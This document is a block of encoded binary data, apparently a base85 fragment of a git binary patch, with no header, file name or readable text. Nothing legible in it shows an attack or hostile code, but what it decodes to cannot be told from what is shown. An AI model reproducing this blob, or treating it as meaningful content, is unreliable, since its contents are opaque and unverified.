z2^9-%U%biy6UjC<6We*o{>q?}>subkKhh+sHXot_lf@%ATJO`YHTcX5W6Os7Tc0s| z%Wr3FUHHXcbJRMpxqmcsOT;-{yaq%YPAA$yTe1~ihv7CdR723Yl*Rn({)_z=Kfidn zyYus2@5i5?ZSL*-RUs?J^u zpN*siXNaW`!(>#ptAH!z(c6F5M}_%<)pcuNdO_xOg2Gz3DFV>Vkr(~Pgqi$q;f|)W zPT;J7kvp~8Rcv5T><}ON>sY=91%@ZhM_$?3t?zDOobb@p_1WSSP_}NB;HWc6dl3#L zY!@4raHWpmEt*Q5pBV*C8hjhb3+X{KEf{3-t5IXVV4rDW@hB`9^ISJrg*~m=9UacV zCWANJc)h#3{+HcdNDiiA{A~$EjUGN{097Cs^8AoQeM}f3!+&Gz`QFWZahM=1xwDV5 zr-g)i^=OCBAI;f*v$sH@^c0C%vP5Ly9?&(tgXiT#5d#kE!k=2#*S&bX+drJgoD+0l zePD;EQqY2zk@?4?*>LBaNMxYuwzhjlZ)wE@wmVwuy8<(HIF#VF(2HNrXkw9(Edord z;?Rbk#=iI(1$|+;Km8xjbB#!lsl5>a|5id8P+ZFpE8kw!!>fc{ccy4OmR|dWP{$AK zwZ zW5AYgEOF-*f+4ZnkSzuq8-wEqkHFcnHw4W9y%RogYT;No1OYzIq%&0*86gMw{7i{) zj#MenTXO?qMO3iE{csedBkT#GA}@EktWUiv9o~?ofX}!bT6W{X9nG`PNTR|jNKgPX z0`CE77tK-9KXp=+T; zzi;}-C~yS|smJr*Y|i?Jqdw^QkSt}%SM|*i`wpI-5}l-WM(c;GOH;9Y@XY3OU_tO@ z!kr^vgz6hoNYL_@t6Fv_IA?sJ`iL!%WnyvEl^goVHa@pykP1FfjnM5QUeTe8LbR)U{Yg zs~#y>tGw2O&d@1#junSE*-N(^1t%FBPXft$r3mqCpUsarXMcEHB-hGXfC|WafPAM^<*2(p+LCHfful?=zfuwQnanoT$~| z1Q8aF|25*VA~A|B?NhS4JxPj-6%=Y|u!IH(t6qriL_B+SX>6r6&YQ;R&*3SZqqF|v z#46XSuc>L&qPlN}jw*=1>BbHUJ^>pG5;`ZF$I|@U2=vkTwilZ(pn&Z;bj!U^Eq9xe zGk={fgCz^OM3A8Q6=!lxeAlPLhCTrY&^F?e^Y@54ZVviq3+!F!(*Y_Va6q=OIcDb_ zqh+!ft$i55e(-km*_eR7MehwsSEpmR6~vo`$&u)>eAPipie}?|w9p%RfnvJia-rU* zESVuW%^`|`D9Q7>$dXUwW<~Aw#iVMFx(~r(o{g6X(-;Hz9LIi4DJ+-JabuO=&z?yURk2$vC3*qMx8{MrY0$o6o&q)A^PML(7A+M1+8q1R! z4--Ec3$n1VLv%r5Lou@>S%Q*qyU9lDk74f&RQQXv$84%hEUIi0H?n`r7+qwkx*@mY zE7F(|l}BYAYpD!6iF|+7Y_wbQch*~(?WS0$V+jJ{Gx4?w{N!?__Rj% zIT8(XTx9@83lCy7mn}AjY?#_?j>@+fc3$Gr;=XO)Zl7L1K+hDtq4;R=E&tQHpVEnf zMa7vbAN84GaEnfe(M0joEKOuR-*G!i_`puiSoKxL8G;PO;t4d>kImaVAxeDS?M7 z53=)52Di$VHtj>RMI#(dt+3)1_r=q#okuTz1je}~@ouu1lRR-y5*6LGYU~UoD*S$O zl48Hz$PvEGzFAeWKI%{2vwq!}5<2G_y#jGw$;dINZrkcFP+qr*0kv;Icn*3aP`s>% zkONArEZ(DJJq(xw{i`g&WjqHO3wp;i4VmBN#A*SsG*WXYOoLu#^|M5BuH}cW#^evC zg;vW4!pB&g<}xF_z>XSC-cOrHdUym|Tf>-p6L0r*HJV}@S*IQ4Z1|0Fs#P{6Bs=&I z%MIC?>8-njU@`V^T|er(PSg(-M43Ef<6+zQc?w`YoN6!j4x0UrtcoKbvFVU;K&wdw zYS~{Sen#=qCzc@&!76WC0JU<3Y==dH$|QAkoQ> zBj0Z@ZNj)9H2MF`vH_93^X`pxp*oiQF(BKl=ah-aD z1!ignw$3ml>muDy#_2%4>0}OHLh_gI^!SO{?qppVW21}b)HWqM1%ALqtL4p?R8jks zLQ)X>PR{>-@q7P-@CfT4n%AICC$XGqjxRYkwT88!YqVxESkIfi?Bjkci-8b{}Xo6T7464yu|-Y@yDF zI7rj?Vv&DxaIhZ@+x^RXyjk507F(Hu~4QPn{Mu@jh#4)XP=8 zKj1W4Z&L> z>IvjE>d|Z-IoPzOF1e#aboSWbm9+gvt`6l!@h8Miz3_~+0|>>=rk?=6J{iGK621pE z6f%rRkiu+41*r6dLmE>lJC@2zO8x0cpOD-MkLy!VGS@*y8odE04ly>xNK(QvwXK~` znQ*lbWPAfzug55pLgX9xkk%uEAA{&AC{ zIM|{9c#M(Jd0s%xArT>PDT!MGQ*=No>@}sQRK6+ zxS+)`USbRoXR6wIl}~PdTN!H1RzBxF8e*y9&eB~xXn6y_QC+{vzc1gj_#U9^chL}? zO~ww1#-r_GA8z3!wbqL8LM0I}0k*ZuUzzwRxciIGP0Nt?eayN0?n zLWl}M({injBw$!$4DEtgE)w|HwO}81fMwpnOl%CL1(%qUC=$a^^xS(9Y4IcNp=iY= zg{kt!i1HZINv!+G7on7(l91U-KJu_yvVIr_o5VFDZ zFAhA(z)Hx6GBj+BP56}vxlK&K1~S=iXQevog}mX2|JccK0Lht{sgV3V!l8&$Y1$_R zcT<}Xp2|02x2H~wm+vi&CSH*{453keS|^HpEyKpyld_A8eTc~#!Doh4M*T4~G9*1d z1)pkrhDcGOp?h-!J(zB$ zCQOugmM1_sO1>m*JaB>0&Txmxvn=)YicE^TM+_07ITYIh1dFj8?`Rj9#F-g-hViiG zLy(u&C?WN}v_y($s}$>Xjl<0jA<8aNNjzdhOV`!2>No3#!eEgiBVM>@4N^@t2QA-Z z2_FZBXsj83tD59o)V-?2MEaC_C-sy+V)d~pCaz*ZgHU$+V0cxMnIo73QJ@0#Ouj&+ zT?AP4p*Gp!=BAE{){+t@e47LsYD&;PH{m~TydEBIZ@#idqYQ~; zC93^_?OiVv`*bj#k6;L_5Nzkg6v;Z{3gSxPa}T-m7)Zu(fX;zmZZ8oTW#O>XL68m0 z-KAB{FE<8C_z;Za9e}fyh=h6b@Q&8>+i&kxE3!QrjBp)-NeDR1<8=onovWT=85k%} zjZ@%*i*UHv@hxhOu4khdKnb2FfFbuJx2+WP^w66Uh1Ri3LIU%n9+R5>w)O+?p)i{$ z*0qaiQIMwWM82TV3bteYxe)OE*%^WpIZcw7vk3FB9&3yQzxT664-&rV*kc?KNFp&% zJ5}G@7~KY-<4qzQy0Wmodw1ieHN-@a6`@cE^;gA@5)}|Hll})1I#9JS`)Sdq|6z>Btb_Bs!m_BNt76BX`DEo5jTXbU% zw1mV}VU7n@&8{|M7DI7-TUSt77QQX;x#hK{MZA^Ww#i)>S#P({wRuVrMvg=t3m!LY z0*)=4B%O3cbx@2(w0VO4=!`)(y{|?R-I9l?lM)HGPUsP|_G4uGr|;fbYW>Zl85&@t zNgw(qURHZ=YygRbnog%KVz0023}G>;=HMI@vag2YoFiP1t%T&SxjvW=YP=lmC9q&F zl3fsb0gS<*40K5UoGV9lh)+{Lx$3#k=U5>0tYmbW%K=i_r86;zfSsX$?b z^^h=O%+3h6bRuPpB!QXYdn>zAy?xvMxVP|4Z=X$$TRFDG4M)S#f-){(Fl(YDF;r709X#R!fYzBZZmI z%6{YC_qUpFzr8P&|8m=GfM(;~clyEAcEm4gv=eb;5{zLUVK$c&YuuD|o-9w8C%_>k z^ON$z{5|FwF!|i)iC+lz+rTK;)HKXiMK&uS0~RzP@tIZEST9Z)>Qu2l(mENh@Mh$KZ~1{b1-Qa^$_5Vv%R8SVFOu^2HWo{=2^KB?5i1VJ5g z6Jk;fh9>wm;jLl5JK!{?i?a}cbq|kNhm&MxihEORKZx^)8rbnm7qjQW+~cvkr9&s= z0!MD)Gsn{H-lYXl`&{*w0~A)xPnP7ITH>F#ntw^Z{k-)jkb_PKSl%t*1gFFK z@=L+@mhOacWsX%ucf1Dl!w4B=Q#GDl&i#5lYJnMS~VPL#n9D@?m& z4-{aZSP65_;Zzw`$D0ZjQ>2`+B@c+Dp%sETIi)9+v(W;&$7KA}|IqIVK8Z0rMnw=Q zw&l*V%kvuH1rEaGI#Ww#G!A%SoMLxm>t|Lg>HsO~EJ{&)1-jjOcmwbrKIzeNG+rQx zuH8{m#!4n4@W(_D&JufovI&B{gy#$qD@I=-mGEU*N+8Mt+x{Jh_EiW}GP}xKwdfek zMg+34Aw5?_J?}OaeGW~AdD~uao{CY@;qV-ac^8=B|?;Uy<5 z3~yoOi?`d}c@An96CttI;a*p!HLW(NOpU`lk)rb1^V16m^H|+uIs!@!Vm#^@hVm-ga0T0nxv#jDwMCe43rnQt#2A#Z%xWQF z>v@_X)+Zf$W7X!HWG}g)g4@~M9iuw(bxK2Es9K>loL=->gl8jOZdspRpcdAAXmh6( zRw9}6cZ8noJd;&n_DP>HE(_NnRpl>-4S|Mj@pAJTJXWLT-)nG!i}~?vgii1V2^_TW zS}evyVr9cpk1YvOb2CO(dTG8%abWJ=ZtSGuVU>~Z+Y|yfWjN;WB>>RHEHN^R)m4tK z9l;L_sG(xY>_g;ZF~j}b8H4>ZFX%cDu=4^#FxW zPz8krp)IBmnWfKCK3_o!jK-$>DU2Qp@*|jd+(yWZp`o$Kfbj2Q{xU+}u_eM&+WGp= zC0t-4qp;c>qEu~nQl!dWPQ9{(5x_=I+CrP*z&* z=L`d5OThrbPcn7ucuT73=@brB?avRqBtLRQ)zt-!dp?J5ESycxmS`Hmd{ss|hjmxV z>r@K#{Ak#p>`oWhQeg2lSN^&lYKQuF;~}PZhGJYq2v&gCU?)RM+N8JN$y(lzh+LW+ zW1`$h6@*13O05AkkauiCp%f4l3Uf+l0p9?ayjnS`Rx{ngpmh;Q@?co&^toG zmplg`L(`ZnV^7(G65OLN*hJYY3Uh%TADb8>(`lU~N7x5wx&g-!HheHnYyZJoBrOYm z)(JIb%YhT1B&&iClkb_0pt)fyJ%3~S7=qbEk`507Y3fi!B#G5?wu>t;B8o$+o>Nc; zpqBN6-5!lXwIQG>(@J$F@^TwzwuPf)=LUcgyzgY#NBP0oEMN}FXR%JyK|>t3<<0y~ z^Ez1|xH213vqRjO3<`@fs!C;QaXm^AtdGy7Wrb0Zj4BGxWOc;7&VIAPS7;|+VUI9> zlV&32CR{}&;hOwH0{lqkgNYpo;8Q5V!tBY`X6mMtpZzX*eQpXsZ^M9)BeTR#i-Opq z$+-E@Ex;kP_y^RGGL{Qr{FMn|nL8GDmx-&2;-s_dS0PKL4ytA;`&RbIO9~!&bV`OD z=RHkWk*Zgr6eBZ}IfBfE_2KmvZ3(hFnk>Pg*i*we&#@sk)CcOned$l2gu#XHryoa0 zzn}w5Y8{h$7j7F9G0cs9KsDtOG98R2bV!jr-QM3*c9{Q(rsKUnGDQ7m6U9IfVde8W zt!Nfa-Ld?OK*X6&h`&A>A&(^U2xppLHCH0Kf} zHhr)oj{s({kQK~JD(Pg2643}0km{$HNSgVVHM6CH>bK~LK#+?V7slW~# z0kb|lL2!i-{fa%T{YqtA6=?B<63%ek>>A0RUFoIcbLJE|$Q&l9RzWHxc3PSHQ$;gM zs@?fXwMY3Uf8+21(d=I9NJ|)Z0KpS|C0j7-aZLQR_a(BsS* zJrT7AS+ANNF#(?4^H^lBn16}$F&GX3LqQ4|fvRjE(z(e^AW2GrK!m(fpR(93DJc^s zG6XQ5!|)&97vx5+ye~ry9W2_Gr7sY`iN>*R6u6a) z9#@9Vy1*_d8^HZ5qPYM;K)$~t40rSk_8w}Ze=(5?Awov*7efmeA*s+m{gM*L1EO{k z-z6$1b(pb#M|cISE64=k(m6^@;6)KiMR(9Qghwd!I|*D4YZ4{nMuI|5zQ@`ggO`5b+KNrI>&WA63K z%KP!{R8?#Kn8cJ=fTEKp3rM<|l&551$4$xx*AJ7YWr zeT15qy+^514Vvta*t}Y2%{$&-_(Ca)RMR3xNR&7C`eGzPe#BG%D8K<+2Q4RtP+w_( zQ(okdM4GedOmo~j8J+3%iXg#RqHs_HH1z?Qe`cRTHef!qLAisC$P8bB`1v4+fUUJjWA}lx%j$;rwwr1+b2#KX|l3--}>CRNExqIU^(^X9rWp za~>hL0BBTOKS&}m+tQz|K-xg$MLZ@A+{Svv`CC0Z`v{ti(azKD)g^Hv*tb+sUMyL* zH7Lac-7H0DDuX!V@?i=^c2=OyQ!K1@4T%L?`9uOJgiUqRF1-i7Pq7*Y%!{9LA2iS4 zb!G{3ZR4T?*}qd3o!;GOYcm=JOvfrd@7(Sjbte24;`%*HqQ^zkUzi7QknW_CP1w{ky;7pOX(4S+cm97$;$ zglkfJ=z!f9BseGMbC$!DR#7Q;N((7Ja)E4`GTI$uf`Ns-x+D1Iwju*lL2>P7D36 zoM(vnz(Pa;q!aYAs_3^k^{7(*8y@&ZZs^rzyH1h{a>`@-Tgm5ZCKJBDzoOUR>W%vU zyFmIXVc{--B+J)|h0+^MBI4KgT$+pA7D(Up+LjBW1mi?pH*|{#Fe=gDNw&GeqLg&m zY7~eqSOs)9=qlE}1TX%qFW}uxVZLWWRHzY}-4T}s@QoQIHJfL<1_Wk6We{-Mzz_&` zePwIzZ+hadV$iNO$gazrE1A)0(^l^Ai*)Cca27su96CK%3Wb=QjpTwTY@WQI-{25D zD*OAE&JMcVp33pTo^N~VEv_SB%n1bZf+Ml7s4_jp6bjs{^Ho&TRLZ`Sr&5N-3OGk! zVKun+$FrfVD~EAqP-M_$r8Nj17>nTIbp}?$@zBtMTfm~}MP%8d%1F3o%rE|&u?S@l zR=EaRVrRgRAQyby)_~e`o$giaxJcOG*;m?#iE(j-u?$=14E%WDusS3nx@6-mXvFg- zHSk}yp`+Jk=gU|38hZ5fpx6Az6lC03^Gurur!Bh5FlJ2GRn_xI%ajKDSzlDI@YkZ+ z?NOpyQkrUv$SVs+P*bM-UgXo78+@^q&%tN^h&b$I@NqO)uxMs}J|Q2}gq`+`5H;@3 zm7NF>vQ$2KBX4Lvcj?YA4_N(PfK{VMuSnLCb57#)k_$Wi!9GPZX-HIX=R~0>$%+*l zV6c+CVZcJCz$JYc^O!0x6KkK-pi#}|N1i9hXsntWPPFs^g@TGHjRxfAjY+&IO*18Q zoiUr)()dj6eSUHVURn`5Q+y>z%Z@ovpmN#a%tB-SzIQn8*ePq=AF|B%>uQ%iZXTCCwTHnTRc(zN0;K|64K_$-ltXP>)Lf)IbAUk9D-Rdw9Hy~-=nv%w}3+2x~HY*C#RYY5&vc z6aeS(=$%kE+^65)!EBye^g=8{10GK0j8nBclXkPi5i%$s_=vbjxh2NJTG<6dm-}A#eCZSW?ZfKZwk{s^bsf@f z{nfpMZtF(LTIuCm)a22-qCEo5p&HpLO6ZwzotqItkSt$H`e*Oq1Ryivj2HS8SwtRU22$R{?nehYYrq9~B(sk^bLn!yle3nFRSw>Z{qkY9thYCpxe8@xpfB*OY z2@?jrTyHhsfO!$~@(un4vb4wW^7zjl%3Y^Onw~!%_mAh*FI%SrBq`%6P)xoUqRe0$ z3~}dvowdb%0#E?96n>+8{RRn0EWtO*SWDoF(!Qd6Z0R46w}FgA#3tCCpx&GHPKMxv zWF9$F6ot9AL#9FgP0p-#KnjT#(qdIc8Vok1s1|O(ROM3$2;!G}1+D`&RYstf;QJQna8ZKjlRgoMnO6yiEekQl zFTGICTjN=)Ms(d1;si>Ebs+2^D0>a3ShfI3W1KEQ(Qo&G`scs^IGZ@( z_Shyzm{=?ggy@&@>xVdUFgGL9@DaSssRRnY9wUD9i*sQTn_CiNV?q+NEv1+o7M^IF zoQeR`4Uic2AY`skOk7?hG6O_G?T&v#W?76Uv3w<%BQg#wA0_0=GQ8R`Nbr;2OeGG$ z$wI6n`Hp*#RSaZW;p`!r#r!2-k#YGX<`NEAM)dRQlPzEl>>tjv8vcllH_;P#bp+7{ z{Ju5&z7$nY1!&BDC0L+=i?FLiq-Wq9v)jdeVRgXt2|iN7;D1YWR9SY4ybnt?N{&`M z73)_{Fk>qQ>w0>SL3#=-C^b$8%4s4K3tAdC!+sSStGLhEE}p#F+=5ZfW=Ke><7vr_ zkH>kFk8+0M1?ohiGJ;gwz}`0WK&_9hvw-8jcnVvCF(4b5#0+DF3Tfs>`6O+m)VGF} z^Qo5D&NI;HDkbAnGYbw-%c{S@IehbqeWQrCXM%oyY18Vvhc}JO$Qet#>_+=uc%!s; zI`tn>AL3JyAtuKEOrx+8(@%Sw4c645wX^~WS_VD&b&a-8Ny1K|{x5iI?JHn-(tKiZ z5D=5*r1)ttKQJHnd@MJIIjRABQf zAkW(q!Lkh^!mK`9SZ$N)LN}=*LI`dMB}i!BDqNow0alDO6{qKmY&(`^9omT>pm-?j zD{dH)@{nBLu~eCA*Gg3h1CuPEY0Cwp=P4c-==3AYkWeK;zs6JsQqL^B6EiVQF$aIfyaJXh(23#j>8GI9sGOduZe}zBF&o{rlhD ztYAHx;~`>fuTfjWLR5Ft?*ldaehA$57FXbdx_AxWpLOHTo3Nxgz ze`2P~u-DNZx{|}L+5b2JA`SJn1}Z8_zpopYM_{L|GB&=;AJFyJHxY29q9wbufD)zZ zf?sr&9qwFEg)gT{(=kn@km*Ez#&`Sc;%> z^3&1h;sM-u3!rZS!w;up7j8kJ>ttkJh(M@rCL9z2+?SI9xd6r2`7?eRN17X&5vT2} zh&-59qEhhn#ST#(0pR(Pj|6y))ELe2-jX;dc`;VyA^Rb^*hH7J^x6W!l^d#1+9AlH zz?tZ=a(3XFEL#q=Z#O8@#g(n7Rqa%e=rg(;JBB-)r%oK6sK3W@|09qw5Bx8X1 zmCVV9A_B9|H9R8;R2X3I59m=UL!+s;88?yz*VE)5WiT==3mU2)BiHQP6I$<~v+~e6 zLF9o_F)lVslJ@&I{AuIvy>I>`BE^L65=@KUyZn`VYu^_4BJ@WWg%${FA2~u287lce z_FAdg2O^F!dPWg!^3Q%3!k6^cyF0-JKOe!F1FS_QXXX|sh_|a{USa)G;>hycL{^b! zf>(e~5S~hI92ttEjICkArlB=A)~)38W)+RPRWWn@I9#l4ZX-0vxbU_rMB`)jwN{_G z7l=`)-LqdTc)h*`Zne89Y z%lHE52bi`s$5x3IU1E_HztCjoL#xljot0Mmsek&e0eS}kqBz{?y3en4vBE^It7N5O zFKTDKSi-WBNDNEj4$)^;g1+wN>t2P`#ed@7`lg%L%pyZ2x3yJNc&Ms_O9Ly1UL{U9 z&zKcM^7q)VYCn`a)^$rMao*0q!O3hjI%&)2m|8&Owo+#bJuOATWL9;$)1^Nr{&m=_ zphku}K+*~)OJW6s?Ar{9e1{wXdEm&K#K4E{SC8Ywl2Wt7XDnuEKFexnjUO2(vzAJ{ zVeJnE!H0TAF-l|k)2POiz-FkM?jU>^e<-xZ3Cu(op2Y;D^43Jm+;s}(kakbejQa$b zfA-Piq#!EBSO|(mKTlKjrC67x1hbs7l~S!2_et!IoYi6!qQw`^$N>ri{^rGgDpNlK!Nl-MLy)gH;HPLe5!CEhxdsS?XD z;D4Cc8DKtRo@f5VUosJ~*4meIGRY*Ra&>!zL3>nEW}b8Q*?V0hVzIF49tyk7q$ri< zqyNl6e!lZ9(l|EYqf(sj#lx3q{RB?H?}>F4a%%SQ7NVb+dS9>hj}NA7wJzL8HHN$| zFB+lHf&Wrha@uC?l1po#-XKmaAp+R88m4i90ty>9Oao`mfcG8s=J6!PPB$Pyl7@*T z*ct8le&;(dQ#kY84hOIoH8AHwt82r0f$}(7fV4H+QX)4z~94_v^ z<%g_QoVtuQnZ2$A*nYN}A1B*^Wn~uc)ins4#uvD=yRxvbz$__P1JoD3f&rZWP)C@ybuZ*&jCjTV_&do|`5Sg6hqSVk}X&zk@BO!8v zINSTp;hhCYDHDQsE{2FoT;!B1lpVGEJa4r#^)=}yum0jym{Q=794hvjc;T$}(OQjU zUg9_@B*Og<@3`=wMcBi$-jAxNLjejJ3(57~i4>*i=Tt{x8}-Yy&(mRO+3*5c>Kh1z z!uDUX$RbdTgi`Uer0YV_fN~``bleClQ?^7}vOvvwK?juZh^o1g8Ehe1VKNEx9f`}CUkUm=hQxon;2ul@Wbu)ZGbr>P=6%}NzZ)`f4aH*+Ta#oN$gaPN_of? zmXMlSlpw;m;O~zl&}^WR_SAZ{b6HP!Ku(144a)f*?2H*$N&F(&M{!Hd{(@?q9Erj6 z2Z|oT1sPP$D@Tn9Lomo-i%=0*Y=AeXEK1GM`S(pB%+fU`;wqrLx{<5RA`!1tNnQ*1 z_SAw-3(K>(6OPo7_@LyCk%D5J6SW8pMZJDfYE_0VlRgUH9YVAqx)Y2oT_`s4rN3Ax zUuiB^xiKWW!Og3+6-Uu^pDj3GXO

Zn|5V2ga}4$^D&tF7E;yT@c(QFnOHZybhZ zbgIji&Q)%@e#Td(;e`f!70XT?_$)2oy!^e~Op)*2zpPms#c`V1LMoUGp9}s( zZuEBSQkE!r4$HR_j=k~nwdCP;{n!#v;(|sJ+;V)HhQXokg90MoVG%jyU16Ca@9rl+ z2Nf>*5XpuFCkkMpfZ4x;Mm`7}ssSisgw$JLWT(zumcdcMo=b%xmE!=~ox?l`$D5am z*4};2HY5cAT6PO`Z9gL33UUe$KVC|N^Wmp`H%Irp%zcY13Lb!+*~B)=Vd$Dl_H%g{ zUC|7cO+QO>cd~e0sq5_#P~ktC1L~%9AD<=h?#6n_(&_<{v5fl<2t^d-)0mE2uB-wT zx`8qVEXnaztPj~8O6L`mJLHscPek0`z@IH40p-52j)Dj{dI&2Al-Xo)X2YOmbE@0Q zi7d;F*YK%U(zt1@d3lWZ!|xz{sq$6AY{k51WjIpU6~Mmqi81J*JP0ggWcwS%5CMuw zF$UV#2mI|LEb0M039qZ+XS8MKoeQAODipbimj4WfGqj00PH-9{I=xxp%e=l>85bT# z&rj4~w#rN;B6h=usxLiSEP+OtbQ=q6sT8<`8Bf`-t2b z$(Mo^^KibH^K^Fb2LJo<2))$#!8!koMjieaU&H?%oxJB~4)OQgKJ)u$M`H!{`^OYS zN)VVFk#F{fq?QR9ICTqg={{(Td72a5C&D45V0d^sWp&dJ-%&@b6}{?(BXTXG`cJb! zUm|;y?0(V6o{pdu-7kXDi{uJT#fiX|zfWvm!;Ec1eu?clAbB5jLiS>5Iljd90DQD! z`^i!JI<-BoLhh&{lu~=}_Kc!mMk>+>r2(aWJGi|dF64X{?&Y}m6Mldax><}KI5m(f z?O!%g_Cg)Iqx%6yVP$iD2sp&k)6=)8g>?m+OM3P*PrF;Q{!w!nrg7_EE`TeXGD5+` zPzpd5nq*IiR-}UbDrLX%31n;tMb1EC4)Z)v3_(j+~@rBkKZR4sum2khk@K z0+oru#TiD6YcM-t*~A5(K#Siy4AC)QvYTFWN!8jJ9ixxc*+!?NU*xOWVPkPUY_AE& z;BOu6SZ~}rg1ZV5sE>*y9^sL{Eh4ZmRtHYQ8c5Db8hfA3w=~oL_^9)0vxgA_RJg~Y zf=%4-JST|`&$n@EQWe*TaIl;1%~nL&mH!xFoH5Z31P$8JdTv?qAvk_cYk9%mN%(MO}yhnlKk5_MtW4P9hD^`ErYPf(gV z)i}O_lGQr_k{Y%Q=PUg}sXdempjOMZ4Q0E?c1rVsuhbE5ns%Sz!6Kf$>^ZB)!I%YV zZKk`szKYo(-y*mC5w;Y9)Zn0DHpu?UoBox)f{8=$jmYP-q1gnaf*xs2U(q*IEmoU0 zKU1m7;q(jMXsKqRLvFZttDusFcBD7WP8(YPaY-VmjtJ7_>)>6f%z@2>PZ1HL12t4J zT{SprhLJM_Cx9xRYH4|JDj2XnbUIC{$CezD<5VQ*IqL+@n@UbPM!01!Rgm~x>{+VW zxT%zh=eAZY(8qXkD7^JJP*7(pm*`5#+q>vRm?fAX7IpCQW4s5cCx!s=gJD(2NrxG@a-!N9GjZ#kkrq2Rq;D%urz5~(cQFY*KQ=oUAwiQE(g9QR4dv|&OSojOXozlDJHV_Yhd%dyz z-GhaNK}}d3oFg#CPy_u7XndT=!#RhN$Myok9&p%aSX*G~b%Y6M1IHP)6zn)IMI2~E zGn!(rQ4=fhVMMUlEhb7fBr`BUCe5ia$cRZknVG}tOHa{n!3=F`bX1#w*XNnX&Pu~6 zi72<>Bri@HqkyQh(qKaK+n}W3Tu@p#`PS2}fp>K+ki zYPVo_8GMuO{1Q0O%MkDSB#nV(dc)u~Ig&_zuhg zWJN==HT?oxP7)&FKgW--4_T0p5Qn6nM?((V<3~>G1Tq7*8zW9qa9{@1=iab{i7o#k z`ie2a1ETVAulO;a)&x*1v0Dk-#zO{81W68Xz5&ZB<)(Xlgb6#`pJbhgN<7!uz8FE- z?sTIjfp4xNY-FUhCBtyz1fr$*4{9_B?t>9YrsHaI!7o|C-s)ne4uZqmDYEqeT9+!E zZDUQ)W{u8G7`7A=vc^Q@s$8cwD<-P?fDS{b5INarjGv4mU-y9lO!xZK;FFyUc@ONL zH^7^i;ic;gl_s8T4vFoA|_NIE^LIjpdj|7_?~y@0}kjzoCq;j^j$ug6W_}H z_4M$3qqnE$e{q5%*V;CJIK_O1RSxWY3R(-!cr(4R9Hx{@2vd%EU#eO)zkw7{iNj7L z4v)ZyDT2?dYGd?*auXOgYMtycxeh*LnzmD=GRf9j0N>C};lZcb$YHpzBrb82ko)?f zEsUChrpdJ(7u>p($|nZ5f~Tb3HLNHT8$xyis)dE#L+p}5se=ntZD4aE64#a^aoxgN zy``cy$P;Wubun`E>AZjfmlr{?;9(AM$}yxf7o>ImC20KxgVvk2@5jw<_}xNo`n0q; zenJ0mb(x+uG6LT_V22_WGTwgp!6U=ndwkv;4X|Q@nX7^i5Y5MNg!7%%?#{a&B9pM_ zvSc`TNf=_%m1b7EXe+0$D-iN@M&WS`CV(?+U3z9^b=If5W|7zcc{6GpLdD^@hnxg~ zP>iZ(Trz_Ih9j9%$yEilR6SJcVJw&-q$Mc-1j&RT4h2V}!M z$8vX@GAO2WqjEi*E@FBnyo&Ns&5``k%4$Dqk%Rx|P!)5Y(5AuP!@Qp^Q;BmuA3EX4QkuI{XY5EyIhrF8^QZw}v%T=|w92}KP- zl)$~)iwO2Y!Z=H>ll5Av(s8cN2cS4KLk^SHnArNxWW1>&FB2-*PwW{6y8Poe+mCmj z?$YYNt0#{gB%!=b=+nLLo&VH%IznwxGSm&9p(2b^$StwJ8&rm+T@*EN7w5`7p>&B# zdW_&e@nQ?@otd5WwawW)JZ=Vi59P!FOsf;%6gfMRwntc_Mu5+r(SZ50J-;v)($m4w zDYPmY8;~(#_KV}P*&g+Yy-URM6fdOR7rFti(w-@}IGR14crkPKY!WXWYb|Hl#)+s{ zB_2H}wU!%3zlcATG?aJNSLdE#N6@mYhyK&l_|GLa67K2biq)K_QeqFrrp=g1mkq?p zG`&BkhRK_=`e)XIvgfG$W9TZ&bE)%Z9PUB~_L5g|Q?Jt!XpZIrx23d03t87lwwr`$ zy{_`brUgLT#Mp7GgCV4R*N_GwWX6ARd?Jhx{?7V~Mc)GoAS{7Cr(DpiYYWaVa7 z#BH!A$(0wK#e3}jA@j6Bd|u@9Dxf7f#6=Sa#hxxq2|0whk2V@;azj{Pb=yL01GUG7 z(r=;Jr}qK}YLTKrhRPd8&=SRVoLSul6vIhOkQPC={gl%J;YBpfV&>_~_0`VW(!Isy zyG!@}_SgTu{CMF${=db=)y27$#|z8&^TI-RVfjh-?rL`x!!`?@t3V#O>#e={rCX)5 zQbbm)ANFz)nd@s=uqM?fEqAsbe?0B*rKH5L+|D7?z(V{;?g154Y&>PMaFy+0hji$8 z0~>u*K}R2(CVvAutdZQ#9kLk>6_o@w7Ylpv0aa@sqRh^n)Mj9NF}j}P8@M0SU&Ess zd(EnpCYZ-f=UPQsQz_jHegOuWs*aG%$0!fEVjB&T`;waPfdU>W-5LV&fBx4>Fyr5z zV(+UtOz{rBJQU@qp4~*YhcbcPA);>E7R@qe(YYwKsViLrM^6`xQ^sB=eT&~nIvHSv zP*gC*xLOkd*VUTEYoKxqjc&xwK^WzjnMCQ19!i{3P8y}%m>U1FOoVIj2D1Q^x4x>v zr3tg#PT~~2!8DgLrm`buEm_fg$-eh&Xg#LHfzpMZt^;Nu1A<_y5ExEl-5VMhw>!Mg z6nBrka^#*)?_tBlrlzZl(x6|mYRUY@6cs{j%VZm@{qHr;aYgTH7g?(mRkyQKoW!W} zE7gluE$X|H91@U*Z>s+{giKm(XlVZs&As^J3>;Hzr)|{@nfh_u)_&flQ<%zzBI2yf~Y++3*)BA!q>5aO$In)n>zNMYh{nL(SPFrl&ry z_aR^|zlKdg);MmgWvMC)=P%)=YJQ8Y`qs}tY)|8U{mzZ;BbXN2)fg=#N6a=Fu~1Zu z5r_!3CCdpEZri(7Q0!sqCKwOe&@2;ZPzRea@(j7AWAS?91RH|-7&0!5uEfb9sw_eR z1q9|(GB~lf=VB&hy@*Ee3t#?}8K=**lb*I!bi6>`;`^MKXFw@0d`!40&A=#5qM2!w z5;ee?5r|VZ+$bn;8a_s&Avv>j1+(gvBq&f_)0x-8m z7_JHJxtYxPG)J@6G<=n^={z{yb%QUa2GT4Vu3T~mW8$n*k`xCciOD4CAM0(~iDK@k zAM!}0oPmO12i0D(veU_K%Q~etD1{#+&CeN-XBHWKIK}9XBxQJG&(@;rw0Ntw&){V~ z^u&7SCUn`S5SR^GDDMch6@NocT}UmqTw?ImV~EHw08*2kzT z+gHw+3fDBY8bD|22lBBFJR=*icb)6+VNqx;3_>hGhpp_;(hU=N9fmFW)eu zcGJU7DsBqxZ49W$vhh6di|G?UZocmW$7qE%Z%&e+!1^sJFSMY;63ny9J`j|B;@ahS z)0Lt?ob1{YUhtr^YZscWV<17(^MD-R{;Bun=@NGFxb&+nzLnC6P|@RR7kyQex`f@m zVTWh2MI`-VzoSHVMLJd3?_wfSDw3exM-@^5$>k^OieHq`w5x22v~e4vG{edYQ%_6e 